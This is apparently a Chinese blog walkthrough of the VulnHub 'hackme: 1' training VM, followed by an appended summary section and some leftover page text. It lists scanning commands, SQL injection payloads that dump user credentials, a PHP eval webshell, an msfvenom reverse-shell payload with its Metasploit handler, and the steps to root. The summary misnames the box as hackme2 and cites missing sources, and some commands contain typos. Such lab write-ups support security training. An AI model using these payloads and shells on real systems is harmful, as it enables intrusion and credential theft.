hackme1新手教学

靶机地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/

1.将靶机下载并导入到vm虚拟机当中,开启hackme1靶场。

2.打开kali虚拟机输入arp-scan -l 查看同一网段的所有IP,寻找靶机的IP地址,发现靶机IP为192.168.47.137

3.通过ifconfig查看kali的IP地址,此处kali作为攻击机。

4.通过masscan --rate=100000 -p 0-65535 192.168.47.137

对靶机进行端口扫描,发现开放80和22端口。

5.通过nmap -T4 -sV -O -p 22,80 192.168.47.137

对80和22端口进行nmap详细扫描查看端口的具体信息。

6.通过dirb http://192.168.47.137命令查看80端口的详细目录,发现目录为upload。

7.访问http://192.168.47.137

8.点击sign up now进行注册,并登录。

9.接下来查看是否有sql注入,点击search可以查看所有信息。

10.在查询框输入OSINT’and 1=1#发现有回显,说明存在注入。

11.输入order by 3#发现有回显,输入order by 4#没有回显,说明字段数为3.

12.输入-1' union select database(),2,3# ,查看数据库具体信息,得到数据库名称为webapphacking 。

13.输入-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#,查询数据库的所有表,得到数据库中存在books表和users表;猜测users表包含账户信息 。

14.输入-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#,查看user表中的所有列,发现有user和password,猜测账户密码很可能存在这两个列中。

15.输入-1' union select group_concat(user),group_concat(pasword),3 from users#,查看user和password的具体信息,发现用户名其中一个是superadmin,最有可能为管理员账户,得到用户名和密码,但是密码被md5加密。

16.对密码进行md5解密,推荐解密网站md5在线加密解密,得到解密结果为Uncrackable。

17.点击sign out of your account进行登录

18.接下里我们getshell,我们在桌面创建一句话木马的php格式文件,一句话木马为<?php eval(@$_POST['wjq']); ?>,点击选择文件进行上传,然后点击upload image。

19.根据页面提示文件上传至uploads中,所以一句话木马的路径为,192.168.47.137/uploads/1.php。

20.用蚁箭进行链接,可以查看后台文件,相当于拿到了服务器的部分权限

21.在kali中输入msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.47.130 lport=4444 -f elf >4444.elf,利用msfvenom生成攻击机的木马文件。

22.然后将生成的木马文件复制到本机win10桌面上传到中国蚁剑,之后只要服务器运行此文件,就会被监听。

23.在kali设置监听,输入代码

msfdb

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set lhost 192.168.47.137 #目标靶机IP

set lport 4444

explort

24.随后在中国蚁剑木马文件的目录下打开终端,设置木马文件的权限并运行文件(如果没有设置权限就会出现下图第一次运行文件时的情况:提示权限不足),输入chmod +x 4444.elf,提权,再运行4444.elf文件

25.运行后,在kali中会监听到服务器,此时获得服务器的shell。

26.切换到shell,输入whoami可查看具体信息

27.获取shell后切换到python终端,输入python -c 'import pty;pty.spawn("/bin/bash")'

28.输入cd home/legacy跳转到home/legacy目录下,ls发现 ./touchmenot文件

输入 ./touchmenot,运行获得root

### 关于 HackMe 靶机通关攻略 #### 利用 Web 应用程序中的 SQL 注入漏洞获取数据库信息 SQL注入是一种常见的Web应用程序安全漏洞,允许攻击者执行任意SQL查询。对于`hackme2`靶场而言,在存在SQL注入的地方可以尝试使用特定的payload来枚举表名[^4]。 ```sql -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' # ``` 此语句将返回名为 `webapphacking` 的数据库下的所有表格名称列表,这有助于进一步了解应用结构并发现潜在的目标数据存储位置。 #### 发现并利用文件上传功能实现远程代码执行 某些情况下,Web应用程序可能提供文件上传的功能。如果这种机制缺乏足够的验证措施,则可能会被用来上载恶意脚本文件(如PHP木马)。一旦成功上传了一句话木马到服务器端,就可以通过向其发送命令请求来进行后续操作[^5]。 ```php <?php phpinfo(); eval($_POST['cmd']); ?> ``` 这段简单的PHP代码片段定义了一个后门接口,它会响应来自客户端提交的数据包中携带的指令参数(`cmd`),从而实现了远程控制的能力。为了定位已上传的一句话木马的确切路径,通常还需要借助目录遍历技术找到对应的URL地址[^3]。 #### 权限提升至超级用户级别 当获得了初步的访问权限之后,下一步便是寻找能够帮助提权的信息配置错误之处。例如,可以通过查找管理员账户凭证者其他敏感资源来完成这一过程。最终目的是以更高的特权状态运行命令,进而完全掌控整个系统环境[^1]。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值